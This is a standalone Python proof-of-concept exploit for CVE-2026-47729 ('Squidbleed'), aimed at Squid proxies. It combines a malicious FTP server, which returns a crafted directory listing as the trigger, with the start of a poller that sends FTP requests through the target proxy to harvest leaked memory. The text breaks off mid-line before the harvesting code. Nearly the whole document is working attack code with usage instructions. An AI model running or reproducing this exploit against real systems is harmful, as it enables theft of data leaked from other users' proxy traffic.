#!/usr/bin/env python3 """ CVE-2026-47729 (Squidbleed) PoC - Standalone Attacker Author: Ashraf Zaryouh "0xBlackash" GitHub: https://github.com/0xBlackash Combines evil FTP server + continuous poller in one script. Usage: python3 CVE-2026-47729.py --proxy 127.0.0.1:3128 --ftp-port 2222 """ import argparse import base64 import re import signal import socket import threading import time import urllib.parse from urllib.parse import urlparse # ==================== EVIL FTP SERVER ==================== TRIGGER = b"drwxr-xr-x 1 u g 0 Jan 01 12:34\r\n" def handle_ftp_client(c): try: c.sendall(b"220 NetWare evil server ready\r\n") dl = None while True: line = b"" while not line.endswith(b"\n"): d = c.recv(1) if not d: return line += d u = line.strip().upper() if u.startswith(b"USER"): c.sendall(b"331 password please\r\n") elif u.startswith(b"PASS"): c.sendall(b"230 logged in\r\n") elif u.startswith(b"SYST"): c.sendall(b"215 UNIX Type: L8\r\n") elif u.startswith(b"PWD"): c.sendall(b'257 "/"\r\n') elif u.startswith(b"TYPE"): c.sendall(b"200 ok\r\n") elif u.startswith(b"EPSV"): dl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) dl.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) dl.bind(('0.0.0.0', 0)) dl.listen(1) p = dl.getsockname()[1] c.sendall(f"229 (|||{p}|)\r\n".encode()) elif u.startswith(b"PASV"): c.sendall(b"500 PASV disabled, use EPSV\r\n") elif u.startswith((b"LIST", b"NLST")): if dl is None: c.sendall(b"425 use EPSV first\r\n") continue c.sendall(b"150 opening\r\n") dc, _ = dl.accept() dc.sendall(TRIGGER) dc.close() dl.close() dl = None time.sleep(0.05) c.sendall(b"226 transfer complete\r\n") elif u.startswith(b"QUIT"): c.sendall(b"221 bye\r\n") return else: c.sendall(b"500 unknown\r\n") except Exception: pass finally: c.close() def start_ftp_server(port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', port)) s.listen(8) print(f"[FTP] Evil server listening on 0.0.0.0:{port}") while True: cn, _ = s.accept() threading.Thread(target=handle_ftp_client, args=(cn,), daemon=True).start() # ==================== POLLER / LEAK HARVESTER ==================== def main(): ap = argparse.ArgumentParser(description="CVE-2026-47729 Squidbleed PoC - by 0xBlackash") ap.add_argument("--proxy", default="127.0.0.1:3128", help="Target Squid proxy host:port") ap.add_argument("--ftp-port", type=int, default=2222, help="Local evil FTP port") ap.add_argument("-t", "--threads", type=int, default=4, help="Polling threads") args = ap.parse_args() # Start FTP server in background threading.Thread(target=start_ftp_server, args=(args.ftp_port,), daemon=True).start() time.sleep(1) phost, pport = args.proxy.split(":") PROXY = (phost, int(pport)) FTP_URL = f"ftp://anon:x@127.0.0.1:{args.ftp_port}/" netloc = urlparse(FTP_URL).netloc.split("@")[-1] attacker_req = ( f"GET {FTP_URL} HTTP/1.1\r\n" f"Host: {netloc}\r\n" f"Connection: close\r\n\r\n" ).encode() RE_HREF = re.compile(rb'class="filename">